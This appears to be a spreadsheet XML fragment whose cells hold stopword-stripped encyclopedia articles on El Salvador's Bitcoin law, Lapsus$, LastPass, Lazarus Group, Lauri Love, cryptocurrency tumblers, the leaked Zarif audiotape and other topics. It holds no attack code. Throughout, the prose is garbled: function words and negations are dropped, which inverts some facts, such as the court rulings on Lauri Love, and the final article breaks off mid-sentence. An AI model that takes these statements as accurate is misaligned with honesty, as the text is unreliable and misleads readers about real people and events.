    <t>bitcoin (spanish: bitcoin, pronounced [ˈlej bitˈkojn]) passed legislative assembly salvador june 2021, giving cryptocurrency bitcoin status legal tender within salvador september 2021. proposed president nayib bukele. text states "the purpose regulate bitcoin unrestricted legal tender liberating power, unlimited transaction, title public private natural legal persons require carrying out". history bitcoin currency salvador experimented since least 2019, current president bukele expressed interest bitcoin mayor salvador 2017. bloomberg news reported june 2021 bukele members nuevas ideas party owned bitcoin years.the coastal village zonte active experiment underway bitcoin local economy since 2019, workers received salary bills bitcoin, others food goods local shops.at conference bitcoin miami june 2021, president bukele announced would looking promulgate allowing bitcoin legal tender, saying would "generate jobs help provide financial inclusion thousands outside formal economy". according bukele, aimed approximately salvadorans without bank accounts, increase inclusion them. bukele argued bill would increase investment well reducing fees current services remittances. pushing bill, bukele cooperated strike, financial service firm uses lightning network settlement, jack mallers, ceo.the passed legislative assembly june 2021, majority vote bitcoin became legal tender september 2021, days publication official gazette, makes salvador first country bitcoin legal tender. bitcoin joined united states dollar second official currency salvador. reception commented something good value" bukele, "young president trying capitalise popular image". also criticized volatility bitcoin used investment, high transaction fees used method payment.siobhan morden amherst pierpont commented could bring complications bukele's talks international monetary fund. noted would "likely compound concerns corruption, money laundering independence regulatory agencies." carlos sousa vontobel asset management expressed concerns decentralized system would lead easier money laundering avoidance. according ernst young, adoption bitcoin legal tender salvador could consequences taxpayers holding cryptocurrency, countries adopt bitcoin legal tender, federal income treatment bitcoin could change. instead treated investment capital asset, bitcoin could treated generating ordinary income section 988."in august 2021 poll conducted salvadoran newspaper prensa gráfica, majority people polled said opposed bitcoin law, almost three quarters respondents said would accept bitcoin payment.according december 2021 survey done central american university days bitcoin came force: 34.8% population confidence bitcoin, 35.3% little confidence, 13.2% confidence, 14.1% confidence. 56.6% respondents downloaded government bitcoin wallet; among 62.9% never used whereas 36.3% uses bitcoin least month. 48.5% respondents think bitcoin abolished. implementation took effect september 2021. early hours took effect official launch technologies deal major change national currency infrastructure, government take bitcoin e-wallet, chivo, offline excessive load. bukele government increased server capacity brought e-wallet back online mid-day. september 2021 also crash bitcoin lowest almost month, causing country experience million paper loss. salvadoran government tried rectify buying bitcoin, allowing price rise 52,000 usd. concerns bitcoin's volatility, result, 1,000 protestors gathered outside supreme court salvador protest law. chivo initially rejected many platforms early first day, became increasingly accepted them.a month adoption bitcoin law, salvadorans bitcoin wallets traditional bank accounts. popular bitcoin wallet—the government's officially-sponsored chivo wallet—had downloaded three million people, "amounting percent population. contrast, 2017, percent salvadorans bank accounts." chivo wallet incentivized government us$30 seed money deposited every salvadoran's account. other lightning-enabled bitcoin wallets used salvadorans lieu chivo. addition, many largest stations country offering cents gallon discount gasoline chivo app. month percent salvadoran consumers used cryptocurrency, percent companies surveyed reported receiving payments bitcoin first month. also legality cryptocurrencies country territory petro, state-issued cryptocurrency venezuela references external links press release, official website legislative assembly salvador opinion financial committee legislative assembly salvador full text english</t>
  </si>
  <si>
    <t>Lapsus$</t>
  </si>
  <si>
    <t>lapsus$, stylised lapsus$, international hacker group known cyberattacks various large tech companies.the group first noted december 2021 breach brazilian health ministry's computer systems. group since breached tech companies including microsoft, nvidia, samsung. group used messaging telegram data dump announcements recruitment. microsoft gave group designation dev-0537.in march 2022, seven arrests made city london police connection police investigation lapsus$. notable breaches 2022, group involved several cybersecurity crimes leading publication victims' data, including: leaking source code employee credentials nvidia, including release code-signing certificates breach microsoft, release source code azure server. this claimed include source code bing search engine breach mercado libre, e-commerce company release source code samsung galaxy phones samsung company data cybersecurity incident within gaming company ubisoft breach identity access management company okta breach 70gb dump globant breach t-mobile's systems breach cisco's systems employee's credentials, gigabytes data stolen. interactions group used messaging telegram, lapsus$ telegram channel used announce data dumps recruit accomplices. march 2022, nearly 50,000 subscribers. group posted polls organisation group target next.the made appeal information march 2022. operating style group's assumed modus operandi based obtaining access victim organisation's corporate network acquiring credentials privileged employees. these credentials acquired number ways, including recruitment hacking privileged employees using methods swapping. lapsus$ used remote desktop network access obtain sensitive data, customer account details source code. group extorted victim organisation threats disclosing data. conspicuous cases, data subsequently released, information posted telegram. composition bloomberg report stated group's mastermind 16-year-old residing oxford, england, another core member teenager brazil. report also stated group seven members likely formed recently. arrests march 2022, seven people aged arrested city london police connection police investigation lapsus$. alleged prominent member group pseudonym white arrested oxford, england. identity allegedly previously disclosed former associate, various groups including research group unit 221b reported identified him. teenage members charged april 2022. references</t>
  </si>
  <si>
    <t>Large Emergency Event Digital Information Repository</t>
  </si>
  <si>
    <t>large emergency event digital information repository (leedir) mobile application allows photo sharing video sharing enables citizens submit pictures videos directly enforcement relief agencies major occurrences including natural disasters, terrorist, criminal events. police embracing apps crowdsource investigations. leedir's free platform activated enforcement and/or relief agencies major emergency event available receive uploads citizens immediately activation. leedir application platform supported providers citizenglobal amazon services. boston marathon bombings showcased value additional civilian information help solving crimes. following event, leedir application created team developers citizenglobal launched april 2014 angeles sheriff's department. platform provided citizenglobal, free charge, enforcement relief agencies large emergency events. events generally defined terrorist attacks, major criminal events large-scale natural disasters. leedir platform provides upload interfaces eyewitnesses analysis management system enforcement relief agencies. leedir supported highly scalable, secure cloud infrastructure provided amazon services. history leedir developed citizenglobal collaboration angeles county sheriff's department amazon services platform acts central repository eyewitnesses send photos/videos terrorist event natural disaster. strategy public safety/private sector crowdsourcing collaboration. leedir/sheriff's department partnership announced november 2013 angeles, california. leedir's secure cloud-based infrastructure supported amazon services. leedir platform available, free charge, enforcement relief agencies throughout u.s.a. april 2014 leedir eyewitness platform launched simulation exercise angeles county sheriff's department. photos videos submitted analyzed three-hour window. following success simulation leedir launched became available. leedir platform designed officials sort tremendous amount eyewitness accounts following large scall emergency event. june 2014, leedir application used santa barbara county sheriff's department help gather clues following civil unrest deltopia. leedir created citizenglobal supported amazon services. developed extension sendus technology founded co-ceo's nick namikas george crowley, bridge online broadcast media. other principals company include, mario wanderley, background telecom technology businesses overseas business development crowley. function leedir installed android, ios, website, citizens, enforcement, relief agencies. users submit photos videos anonymously mobile phone online leedir website. video submissions length uploaded sent mobile platforms directly leedir website. photo submissions uploaded sent mobile platforms directly leedir website. there limit amount photos submitted. references external links leedir citizenglobal</t>
  </si>
  <si>
    <t>LastPass</t>
  </si>
  <si>
    <t>lastpass freemium password manager stores encrypted passwords online. standard version lastpass comes interface, also includes plugins various browsers apps many smartphones. also includes support bookmarklets. logmein, inc. (now goto) acquired lastpass october 2015. december 2021, logmein announced lastpass would made separate company accelerate release timeline. overview user's content lastpass, including passwords secure notes, protected master password. content synchronized device user uses lastpass software extensions information encrypted aes-256 encryption pbkdf2 sha-256, salted hashes, ability increase password iterations value. encryption decryption takes place device level.lastpass form filler automates password entering form filling, supports password generation, site sharing site logging, two-factor authentication. lastpass supports two-factor authentication various methods including lastpass authenticator mobile phones well others including yubikey. lastpass available extension many browsers, including google chrome, mozilla firefox, apple safari, microsoft edge, vivaldi, opera. also apps available smartphones running android, ios, windows phone operating systems. apps offline functionality. note lastpass shuts google chrome browser setting allowing user automatically save pass words browser. [see https://support.google.com/chrome/a/thread/7312208/how-do-i-change-offer-to-save-password-bar-when-it-s-locked?hl=en] unlike major password managers, lastpass offers user-set password hint, allowing access master password missing. history december 2010, announced lastpass acquired xmarks, browser extension enabled password synchronization browsers. acquisition meant survival xmarks, financial troubles, although services remained separate, acquisition reduced price paid premium subscriptions combining services. march 2018, xmarks service announced shut 2018, according email lastpass users.on october 2015, logmein, inc. acquired lastpass $110 million. company combined lastpass brand similar product, meldium, already acquired logmein.on february 2016, lastpass unveiled logo. previous logo, prominently featured asterisk, subject trademark lawsuit filed early 2015 e-trade, whose logo also features asterisk.on march 2016, lastpass released lastpass authenticator, free two-factor authentication app.on november 2016, lastpass announced free accounts would support synchronizing user content device, feature previously exclusive paid accounts. earlier, free account service meant would sync content app.in august 2017, lastpass announced lastpass families, family plan sharing passwords, bank account info, sensitive data among family members annual subscription. they also doubled price premium version without adding features instead, features free version removed.on february 2021, lastpass announced march free versions would usable desktop mobile devices, rather both. user wishing continue using would premium (i.e. paid for) version. they would also discontinue email support free users time. reception march 2009, magazine awarded lastpass five stars, "excellent" mark, "editors' choice" password management. review 2016 following release lastpass earned service five stars, "outstanding" mark, "editors' choice" honor.in july 2010, lastpass's security model extensively covered approved steve gibson security podcast episode 256. also revisited subject relates national security agency security podcast episode 421.in october 2015 logmein acquired lastpass, founder siegrist's blog filled user comments voicing criticism logmein. sites zdnet, forbes infoworld posted articles mentioning outcry existing customers, said would refuse business logmein, raised concerns logmein's reputation.in 2017 consumer reports article guido, trail bits, called lastpass popular password manager (alongside dashlane, keepass, 1password), choice mostly personal preference. march 2019, lastpass awarded best product identity management award seventh annual cyber defense magazine infosec awards.in february 2021, response lastpass limiting free tier type device, barry collins forbes called change "bait switch" makes free accounts "much less useful used "ruins" free tier. security issues 2011 security incident tuesday, 2011, lastpass discovered anomaly incoming network traffic, similar anomaly outgoing traffic. administrators found none hallmarks classic security breach (for example, non-administrator user elevated administrator privileges), neither could determine anomalies' cause. furthermore, given size anomalies, theoretically possible data email addresses, server salt, salted password hashes copied lastpass database. address situation, lastpass took "breached" servers offline could rebuilt and, 2011, requested users change master passwords. they said direct evidence customer information compromised, preferred side caution. however, resulting user traffic overwhelmed login servers, company administrators—considering possibility existing passwords compromised trivially small—asked users delay changing passwords notice. 2015 security breach monday, june 2015, lastpass posted blog post indicating lastpass team discovered halted suspicious activity network previous friday. their investigation revealed lastpass account email addresses, password reminders, server user salts, authentication hashes compromised; however, encrypted user vault data affected. company blog said, confident encryption measures sufficient protect vast majority users. lastpass strengthens authentication hash random salt 100,000 rounds server-side pbkdf2-sha256, addition rounds performed client-side. this additional strengthening makes difficult attack stolen hashes significant speed." 2016 security incidents july 2016, blog post published independent online security firm detectify detailed method reading plaintext passwords arbitrary domains lastpass user's vault user visited malicious site. this vulnerability made possible poorly written parsing code lastpass extension. flaw disclosed publicly detectify lastpass notified privately able browser extension. lastpass responded public disclosure detectify post blog, revealed knowledge additional vulnerability, discovered member google security team, already fixed lastpass. 2017 security incidents march tavis ormandy discovered vulnerability lastpass chrome extension. exploit applied lastpass clients, including chrome, firefox edge. these vulnerabilities disabled march patched march 22.on march ormandy discovered additional security flaw allowing remote code execution based user navigating malicious website. this vulnerability also patched. 2019 security incidents friday, august 2019, tavis ormandy reported vulnerability lastpass browser extension sites malicious javascript code could obtain username password inserted password manager previously visited site. september 2019, lastpass publicly announced vulnerability, acknowledging issue limited google chrome opera extensions only; nonetheless, platforms received vulnerability patch. 2021 third-party trackers security incident 2021 discovered android contained third-party trackers. also, 2021, article site bleepingcomputer reported lastpass users warned master passwords compromised. references external links official website</t>
  </si>
  <si>
    <t>Bitcoin Improvement Proposals</t>
  </si>
  <si>
    <t>bitcoin improvement proposal (bip) design document introducing features information bitcoin. bip, amended, since become standard formally communicating ideas potential bitcoin improvements. history concept introduced 2011-08-19 amir taaki, form first bip. second bip, 'bip2 published years later. format process closely mimicks process internet improved, building referring requiring document formatted rfc822 style header, addressed bitcoin development mailing list. types there three types bips: standards track bips changes network protocol, block transaction validation, anything affecting interoperability. informational bips design issues, general guidelines. this type proposing features represent community consensus process bips describes proposes change process. similar standards bips apply outside bitcoin protocol. notable bips bip32 bip32 specification introduced standard hierarchical deterministic (hd) wallets extended keys bitcoin. deterministic wallets generate multiple "child" pair chains master private "root" deterministic way. with adoption standard, keys could transferred wallet software single extended private (xprv), greatly improving interoperability wallets. bip39 bip39 proposal describing plain language words chosen specific word list, process using string derive random seed used generate wallet described bip32. this approach utilizing mnemonic phrase offered much user friendly experience backup recovery cryptocurrency wallets. bip44 bip44 defines logical hierarchy deterministic wallets based algorithm described bip32 purpose scheme described bip43. allows handling multiple coins, multiple accounts, external internal chains account millions addresses chain. list bips notes also bitcoin cryptocurrency</t>
  </si>
  <si>
    <t>Lauri Love</t>
  </si>
  <si>
    <t>lauri love born december 1984, united kingdom) british activist previously charged united states alleged activities hacker collective anonymous. love's case cited precedent julian assange extradition proceedings. early life education love stradishall, suffolk. parents, alexander love, prison chaplain prison highpoint north, sirkka-liisa love finnish citizen), also works prison, live stradishall. dual citizenship united kingdom finland.after dropping sixth form college working turkey plant, love applied finnish passport, served finnish army months, became conscientious objector finished another months obligation alternative civilian service.after that, applied university nottingham england dropped second term physical mental collapse, university glasgow scotland, dropped second year, health reasons. part 2011 hetherington house occupation, student protest glasgow university. united states indictment january 2013, website united states sentencing commission replaced video protesting treatment activist aaron swartz committed suicide days earlier. video claimed responsible obtained secrets united states army, missile defense agency, nasa ever released encrypted form. subsequent investigation named lauri love indictments (2013 district jersey, 2014 southern district york eastern district virginia) allegedly "breaching thousands computer systems united states elsewhere including computer networks federal agencies steal massive quantities confidential data". united states made extradition request.love's attorney america ekeland. national crime agency arrest national crime agency (nca) arrested love october 2013. february 2015, news revealed love taking legal action return computers seized arrested.in 2016, judge nina tempia westminster magistrates' court ruled love tell passwords, encryption keys, are. extradition hearing during love's extradition hearing june 2016 westminster magistrates' court london, father testified lauri love autistic extradited. specifically, testified diagnosed autistic adult serving finnish army. psychologist simon baron-cohen, diagnosed love autistic 2012, testified love extradited diagnosed disorders, also include eczema, psychosis, depression. baron-cohen stated love told would commit suicide extradited.love, lived home parents, testified extradition hearing june 2016. supported courage foundation. love's barrister extradition hearing cooper doughty street chambers. case adjourned.on september 2016, westminster magistrates' court, judge ruled love could extradited united states. love's solicitor karen todner said would appeal, february 2018, lord chief justice lord burnett justice ouseley, high court, upheld appeal extradition extradition would "oppressive reason physical mental condition". popular culture january 2018, announced novelist frederick forsyth would publish novel inspired lauri love gary mckinnon stories. novel, fox, released autumn 2018. also gary mckinnon also accused hacking american military computers. extradition united states blocked october 2012 home secretary theresa may, human-rights grounds. references external links media related lauri love wikimedia commons</t>
  </si>
  <si>
    <t>Bitcoin Gold</t>
  </si>
  <si>
    <t>bitcoin gold (btg) cryptocurrency. hard fork bitcoin, open source cryptocurrency. open source, decentralized digital currency without central bank intermediary sent user user peer-to-peer bitcoin gold network. stated purpose hard fork change proof work algorithm asics (application-specific integrated circuits) used mine bitcoin cannot used mine bitcoin gold blockchain hopes enabling mining commonly available graphics cards democratize decentralize mining distribution cryptocurrency. project began community-driven effort co-founders, half continue serve project's board (including lead developer, hang yin.) history bitcoin gold hard forked bitcoin blockchain october 2017, block height 491407.in july 2018, bitcoin gold implemented mining algorithm. actual algorithm developed zcash (now, electric coin company) based parameter &lt;200,9&gt;. bitcoin gold modified algorithm adopting parameter &lt;144,5&gt;. this algorithm called equihash-btg. algorithm requires memory originally developed zcash. network attacks soon launch, website came distributed denial service attack, received criticism coinbase bittrex hastily together, well including developer pre-mine.in 2018, bitcoin gold hashing attack unknown actor. this type attack makes possible manipulate blockchain ledger transactions recorded, spend digital coins once. during attack, 388,000 (worth approximately us$18 million) stolen several cryptocurrency exchanges. bitcoin gold later delisted bittrex, team refused help damages.bitcoin gold suffered attacks january 2020. july 2020 version 0.17.2 released "emergency update" order elude long attack chain originated days before. references</t>
  </si>
  <si>
    <t>Bitcoin Fog</t>
  </si>
  <si>
    <t>cryptocurrency tumbler cryptocurrency mixing service service mixes potentially identifiable "tainted" cryptocurrency funds others, obscure trail back fund's original source. this usually done pooling together source funds multiple inputs large random period time, spitting back destination addresses. funds lumped together distributed random times, difficult trace exact coins. tumblers arisen improve anonymity cryptocurrencies, usually bitcoin (hence bitcoin mixer), since currencies provide public ledger transactions. goal anonymity, tumblers used money launder cryptocurrency. background tumblers take percentage transaction total coins mixed turn profit, typically 1–3%. mixing helps protect privacy also used money laundering mixing illegally obtained funds. mixing large amounts money illegal, violation anti-structuring laws. financial crimes author jeffrey robinson suggested tumblers criminalized potential illegal activities, specifically funding terrorism; however, report suggests terrorism-related activities "relatively limited". there least incident exchange blacklisted "tainted" deposits descending stolen bitcoins. existence tumblers made anonymous darknet markets easier enforcement harder. peer-to-peer tumblers peer-to-peer tumblers place meeting bitcoin users, instead taking bitcoins mixing. users arrange mixing themselves. this model solves problem stealing, middleman. when completely formed, exchange bitcoins participants begins. apart mixing server, none participants know connection incoming outgoing addresses coins. privacy wallets another alternative mixing services "privacy wallets", allowing users exchange bitcoin untraceable manner using so-called coinjoin transactions. since central server involved, eliminates problem mixing server stealing money acting enforcement honeypot. recent years, criminals increasingly moved mixing services privacy wallets. money laundering december 2013 cryptocurrency tumbler bitcoin used launder part 96,000 robbery sheep marketplace.in february 2015, total 7,170 bitcoin stolen chinese exchange bter.com traced back tumbler.in february 2020, alleged operator cryptocurrency tumbler indicted charges "money laundering conspiracy, operating unlicensed money transmitting business conducting money transmission without d.c. license."in april 2021, u.s. federal authorities arrested founder bitcoin fog, russian-swedish named roman sterlingov, charges money laundering, operating unlicensed money transmitting business, money transmission without license district columbia. alleged years operation, bitcoin laundered million bitcoin value approximately $335 million.in 2022 tumblers blender.io tornado cash sanctioned united states department treasury, making illegal citizens, residents companies service also anonymity privacy blockchain references</t>
  </si>
  <si>
    <t>Lazarus Group</t>
  </si>
  <si>
    <t>lazarus group (also known monikers guardians peace whois team) cybercrime group made unknown number individuals north korean state. while much known lazarus group, researchers attributed many cyberattacks 2010 2021. originally criminal group, group designated advanced persistent threat intended nature, threat, wide array methods used conducting operation. names given cybersecurity organizations include hidden cobra (used united states intelligence community refer malicious cyber activity north korean government general) zinc microsoft).the lazarus group strong links north korea. united states federal bureau investigation says lazarus group north korean "state-sponsored hacking organization". according north korean defector kuk-song, unit internally known north korea liaison office. north korea benefits conducting cyber operations present asymmetric threat small group operators, especially south korea. history earliest known attack group responsible known "operation troy", took place 2009 2012. this cyber-espionage campaign utilized unsophisticated distributed denial-of-service attack (ddos) techniques target south korean government seoul. they also responsible attacks 2011 2013. possible also behind 2007 attack targeting south korea, still uncertain. notable attack group known 2014 attack sony pictures. sony attack used sophisticated techniques highlighted advanced group become time. lazarus group reported stolen us$12 million banco austro ecuador us$1 million vietnam's tien phong bank 2015. they also targeted banks poland mexico. 2016 bank heist included attack bangladesh bank, successfully stealing us$81 million attributed group. 2017, lazarus group reported stolen us$60 million eastern international bank taiwan although actual amount stolen unclear, funds recovered.it clear really behind group, media reports suggested group links north korea. kaspersky reported 2017 lazarus tended concentrate spying infiltration cyberattacks whereas sub-group within organisation, kaspersky called bluenoroff, specialised financial cyberattacks. kaspersky found multiple attacks worldwide direct link address) bluenoroff north korea.however, kaspersky also acknowledged repetition code could “false flag” meant mislead investigators attack north korea, given worldwide wannacry worm cyber attack copied techniques well. this ransomware leverages exploit known eternalblue hacker group known shadow brokers made public april 2017. symantec reported 2017 "highly likely" lazarus behind wannacry attack. 2009 operation troy next incident took place july 2009 sparked beginning "operation troy." this attack utilized mydoom dozer malware launch large-scale, quite unsophisticated, ddos attack south korean websites. volley attacks struck three dozen websites placed text "memory independence day" master boot record (mbr). 2013 south korea cyberattack (operation 1mission/ darkseoul) over time, attacks group grown sophisticated; techniques tools become better developed effective. march 2011 attack known "ten days rain" targeted south korean media, financial, critical infrastructure, consisted sophisticated ddos attacks originated compromised computers within south korea. attacks continued march 2013 darkseoul, wiper attack targeted three south korean broadcast companies, financial institutes, isp. time, groups going personas ″newromanic cyber army team whois team″, took credit attack researchers know lazarus group behind time. researchers today know lazarus group supergroup behind disruptive attacks. late 2014: sony breach lazarus group attacks culminated november 2014. day, reddit post appeared stating sony pictures hacked unknown means; perpetrators identified "guardians peace". large amounts data stolen slowly leaked days following attack. interview someone claiming part group stated siphoning sony's data year. hackers able access previously unreleased films, emails, personal information around 4,000 employees. early 2016 investigation: operation blockbuster under name ″operation blockbuster″, coalition security companies, novetta, able analyse malware samples found different cyber-security incidents. using data, team able analyse methods used hackers. they linked lazarus group number attacks pattern code re-usage. 2016 bangladesh bank cyber heist bangladesh bank cyber heist, theft took place february 2016. thirty-five fraudulent instructions issued security hackers swift network illegally transfer close us$1 billion federal reserve bank york account belonging bangladesh bank, central bank bangladesh. five thirty-five fraudulent instructions successful transferring us$101 million, us$20 million traced lanka us$81 million philippines. federal reserve bank york blocked remaining thirty transactions, amounting us$850 million, suspicions raised misspelled instruction. cybersecurity experts claimed north korea-based lazarus group behind attack. 2017 wannacry ransomware attack wannacry attack massive ransomware cyberattack institutions across globe ranging britain, boeing, even universities china 12th may, 2017. attack lasted hours minutes. europol estimates affected nearly 200,000 computers countries, primarily affecting russia, india, ukraine, taiwan. this first attacks travel cryptoworm. cryptoworms recent form computer virus travel computers using networks, exploiting port 445). infected, need click link malware spread autonomously, computer connected printer, beyond adjacent computers, perhaps connected wifi, etc. port vulnerability allowed malware move freely across intranets, infect thousands computers rapidly. wannacry attack first large scale uses cryptoworm. attack virus exploited vulnerability windows operating system, encrypted computer's data return bitcoin worth roughly $300 key. order encourage payment, ransom demand doubled three days, paid week, malware deletes encrypted data files. malware used legitimate piece software called windows crypto, made microsoft scramble files. once encryption completed, filename "wincry" appended, root wannacry name. wincry base encryption, additional exploits, eternalblue doublepulsar, used malware make cryptoworm. eternalblue automatically spreads virus networks, doublepulsar triggered activate victim's computer. words, eternalblue infected link computer, doublepulsar clicked you.marcus hutchins brought attack end, received copy virus friend security research company discovered kill switch hardcoded virus. malware included periodic check specific website running, would proceed encryption website exist. hutchins identified check, promptly registered relevant domain 3:03 utc. malware immediately stopped propagating infecting machines. this interesting, clue created virus. usually stopping malware takes months back forth fighting hackers security experts, easy unexpected. another interesting unusual aspect attack files recoverable paying ransom: $160,000 collected, leading many believe hackers money.the easy kill switch lack revenue many believe attack state-sponsored; motive financial compensation, cause chaos. after attack security experts traced doublepulsar exploit back united states exploit developed cyberweapon. exploit stolen russian backed hacking group, shadowbrokers, first tried auction off, failing simply gave away free. subsequently revealed vulnerability microsoft issued update march 14th 2017,a little month attack occurred. enough. update mandatory majority computers vulnerability resolved issue time 12th rolled around, leading astonishing effectiveness attack. aftermath department justice british authorities later attributed wannacry attack north korean hacking gang, lazarus group. 2017 cryptocurrency attacks 2018, recorded future issued report linking lazarus group attacks cryptocurrency bitcoin monero users mostly south korea. these attacks reported technically similar previous attacks using wannacry ransomware attacks sony pictures. tactics used lazarus hackers exploit vulnerabilities hancom's hangul, south korean word processing software. another tactic spear-phishing lures containing malware sent south korean students users cryptocurrency exchanges like coinlink. user opened malware stole email addresses passwords. coinlink denied site users emails passwords hacked. report concluded “this late-2017 campaign continuation north korea’s interest cryptocurrency, know encompasses broad range activities including mining, ransomware, outright theft...” report also said north korea using cryptocurrency attacks round international financial sanctions. north korean hackers stole us$7 million bithumb, south korean exchange february 2017. youbit, another south korean bitcoin exchange company, filed bankruptcy december 2017 assets stolen cyberattacks following earlier attack april 2017. lazarus north korean hackers blamed attacks. nicehash, cryptocurrency cloud mining marketplace lost 4,500 bitcoin december 2017. update investigations claimed attack linked lazarus group. september 2019 attacks mid-september 2019, issued public alert version malware dubbed electricfish. since beginning 2019, north korean agents attempted five major cyber-thefts world-wide, including successful million theft institution kuwait. late 2020 pharmaceutical company attacks ongoing covid-19 pandemic, pharmaceutical companies became major targets lazarus group. using spear-phishing techniques, lazarus group members posed health officials contacted pharmaceutical company employees malicious links. thought multiple major pharma organizations targeted, confirmed angloswedish-owned astrazeneca. according report reuters, wide range employees targeted, including many involved covid-19 vaccine research. unknown lazarus group's goal attacks, likely possibilities include: stealing sensitive information sold profit. extortion schemes. giving foreign regimes access proprietary covid-19 research.astrazeneca commented incident experts believe sensitive data compromised yet. march 2022 online game axie infinity attack said "through investigations able confirm lazarus group apt38, cyber actors associated [north korea], responsible theft". u.s. sanctions april 2022, treasury's ofac placed lazarus list north korea sanctions regulations section 510.214. education north korean hackers sent vocationally shenyang, china special training. they trained deploy malware types onto computers, computer networks, servers. education domestically includes chaek university technology, il-sung university moranbong university, picks brightest students across country puts years special education. units lazarus believed units. bluenoroff bluenoroff (also known apt38, stardust chollima, beagleboyz, nickel gladstone) financially motivated group responsible illegal transfers money forging orders swift. bluenoroff also called apt38 mandiant) stardust chollima crowdstrike).according 2020 report u.s. army, bluenoroff 1,700 members carrying financial cybercrime concentrating long-term assessment exploiting enemy network vulnerabilities systems financial gain regime take control system. they target financial institutions cryptocurrency exchanges, including organizations least countries 2014 2021 bangladesh, india, mexico, pakistan, philippines, south korea, taiwan, turkey, chile, vietnam. revenue believed towards development missile nuclear technology.bluenoroff's infamous attack 2016 bangladesh bank robbery tried swift network illegally transfer close us$1 billion federal reserve bank york account belonging bangladesh bank, central bank bangladesh. after several transactions went (us$20 million traced lanka us$81 million philippines), federal reserve bank york blocked remaining transactions, suspicions raised misspelling.malware associated bluenoroff include: "darkcomet, mimikatz, net, nestegg, macktruck, wannacry, whiteout, quickcafe, rawhide, smoothride, tightvnc, sorrybrute, keylime, snapshot, mapmaker, net.exe, sysmon, bootwreck, cleantoad, closeshave, dyepack, hermes, twopence, electricfish, powerratankba, powerspritz"tactics commonly used bluenoroff include: phishing, backdoors, drive-by compromise, watering hole attack, exploitation insecure out-of-date versions apache struts execute code system, strategic compromise, accessing linux servers. it's reported sometimes work together criminal hackers. andariel andariel (also spelled andarial, also known silent chollima, dark seoul, rifle, wassonite) logistically characterized targeting south korea. andariel's alternative name called silent chollima stealthy nature subgroup. organization south korea vulnerable andariel. targets include government, defense, economic symbol.according 2020 report u.s. army, andarial 1,600 members whose mission reconnaissance, assessment network vulnerabilities, mapping enemy network potential attack. addition south korea, also target governments, infrastructure, businesses. attack vectors include: activex, vulnerabilities south korean software, watering hole attacks, spear phishing (macro), management products (antivirus, pms), supply chain (installers updaters). malware used include: aryan, gh0st rat, rifdoor, phandoor, andarat. indictments february 2021, department justice indicted three members reconnaissance general bureau, north korean military intelligence agency, participated several lazarus hacking campaigns: hyok, chang hyok park hyok already indicted earlier september 2018. individuals u.s. custody. canadian chinese individuals also charged acted money mules money launderers lazarus group. coverage group subject world service podcast lazarus heist broadcast 2021. second season coming 2022. also north korea–united states relations ricochet chollima kimsuky park hyok unit notes references sources virus news (2016). "kaspersky helps disrupt activity lazarus group responsible multiple devastating cyber-attacks", kaspersky lab. (2014). breakdown analysis december 2014 sony hack". riskbased security. cameron, dell (2016). "security researchers mysterious 'lazarus group' hacked sony 2014", daily dot. zetter, (2014). "sony hacked hard: what know don't know far", wired. zetter, (2016). "sony hackers were causing mayhem years before they company", wired. external links indictment park hyok, september 2018 indictment park hyok, chang hyok january 2020 lazarus heist part podcast world service.</t>
  </si>
  <si>
    <t>Le Trombinoscope</t>
  </si>
  <si>
    <t>trombinoscope french language directory service publication french political world. published volumes. trombinoscope created 1981 félix colin, parliamentary journalist, published huveaux politique subsidiary company dods (group) plc.published year, contains biographies 7,500 personalities print 12,500 copies. trombinoscope also awards many annual prizes: political personality year, minister year, political revelation year, deputy year, senator year, local elected official year european year. dods also publishes lettre trombinoscope", monthly newsletter, print 3,500 copies. there also trombinoscope european union, published since 2000, 3,400 biographies, health trombinoscope, published since 2006, contains biographies. references external links official site publisher's website</t>
  </si>
  <si>
    <t>Leaked Mohammad Javad Zarif audiotape</t>
  </si>
  <si>
    <t>april 2021, three hours audiotape leaked seven-hour interview economist saeed leylaz iranian foreign minister mohammad javad zarif. taped conversation connected oral history project, titled islamic republic, military field rules," documents work then-president hassan rouhani government. tape obtained london-based news channel iran international publicized york times. zarif dispute authenticity leaked tape, questioned motive. iran international noted zarif's claim "not credible."although tape authenticated, iranian foreign ministry spokesman deny validity, critics zarif calling resignation, saying threatened iran’s national security revealing world country’s inner politics". iran's president hassan rouhani ordered investigation identify leaked tape. stated "stolen clear reasons". 2021, instagram post, zarif apologized remarks made soleimani. john kerry iranian diplomacy tape, zarif said former u.s. secretary state john kerry told israel attacked iranian assets syria least times." zarif said astonished admission. kerry recorded speaking tape, date recording unknown. posting iran international's website indicated zarif taken aback, irgc informed israeli strikes iran, kerry.nbc reported leaked tape "inflamed debate raging iran nuclear deal" upcoming presidential elections. also, effects "republican opponents nuclear diplomacy iran seized zarif's account". history september 2013, kerry zarif p5+1 iran summit, eventually jcpoa nuclear agreement. highest-level direct contact united states iran last years, made kerry first u.s. secretary state iranian counterpart since 1979 iranian revolution.in april 2021, spokesperson united states department state price stated press briefing confirm accuracy authenticity zarif audiotape claims, implied kerry would likely disclosing confidential information occurred. stated prior press reporting israeli attacks syria would made suspected call contents already part public record, making kerry's alleged disclosures zarif confidential. noted, israeli prime minister benjamin netanyahu revealed july 2017 israeli airstrikes targeted iranian-backed hezbollah-bound convoys syria "dozens times", august 2017, israeli force chief maj. gen. amir eshel confirmed israel attacked convoys bringing arms hezbollah several times past five years. 2018, israeli intelligence minister israel katz stated last years israel taken military action [against iran] times within syria itself." however, unclear whether kerry allegedly revealed israeli operations zarif israel publicly reported 2018.in 2019, angeles times reported then-president donald trump said kerry “should prosecuted” meeting privately iranian officials. investigation requests nineteen republican senators signed letter asking president biden investigate zarif claim, writing: write convey grave concerns u.s. special presidential envoy climate john kerry’s position member administration's national security council record past present potentially working america’s adversaries national security interests allies. investigate recent allegations secretary kerry revealed sensitive information iranian foreign minister mohammad javad zarif, true, call removal national security team."three republican representatives, wagner, andy barr, zeldin, sent letter diana shaw, state department's acting inspector general, asking full investigation zarif's claims. letter wrote, “given gravity security threat iran poses u.s. israeli interests, respectfully fully investigate allegations...iran serious threat israel, bulwark democracy stability middle east. national security interest stand strategic ally sell adversaries”. letter also requested shaw make determination kerry security clearance revoked.the lawmakers inquired role kerry formulating biden administration's policy re-entering jcpoa. they also questioned whether state department knew iranian proxy “follow-on attacks” made israel kerry allegedly zarif.in 2021, republicans house oversight reform committee requested documents white house regarding kerry's security clearance. letter, signed three republicans panel, questioned "kerry’s fitness serve current role national security council" whether maintain security clearance. reactions john kerry tweet, kerry denied zarif's account, writing: tell story allegations unequivocally false. this never happened either secretary state since.” biden administration united states secretary state antony blinken dismissed audiotape "utter nonsense." spokesperson 